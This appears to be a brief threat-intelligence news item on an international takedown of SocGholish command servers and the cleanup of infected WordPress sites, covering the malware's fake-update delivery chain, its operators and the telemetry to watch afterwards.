Multi-Nation Operation Seizes 106 SocGholish C2 Servers, Cleans 14,971 WordPress Sites

SocGholish, active since 2017, injects browser-profiling JavaScript into WordPress, Joomla, and Drupal via stolen credentials or unpatched vulnerabilities. The loader serves fake update pages that deliver Gholoader, MintsLoader, then LockBit, RansomHub, AsyncRAT, or GhostWeaver. ShadowServer recorded 1.44 million compromised WordPress instances in May alone; Infoblox reported 55 percent of its cloud customers touched the framework this year.

Procurement and incident records show TA569/DEV-0206 functions as an initial-access broker supplying Evil Corp-linked operators. Dutch police notifications targeted credential reuse rather than zero-days, revealing the dominant infection vector remains weak admin hygiene across millions of sites. No public contract awards detail the private-sector sensor feeds used to map the 106 domains.

The takedown removed backdoors but left the underlying credential-stuffing and plugin-vulnerability pipeline intact. Similar operations against SystemBC and GlassWorm produced rapid re-infection within weeks when site owners received only advisory notices.

Next indicators will appear in ShadowServer sinkhole telemetry and Proofpoint drive-by telemetry within 60 days; sustained reduction below 300,000 active WordPress implants would signal a durable infrastructure loss rather than temporary relocation.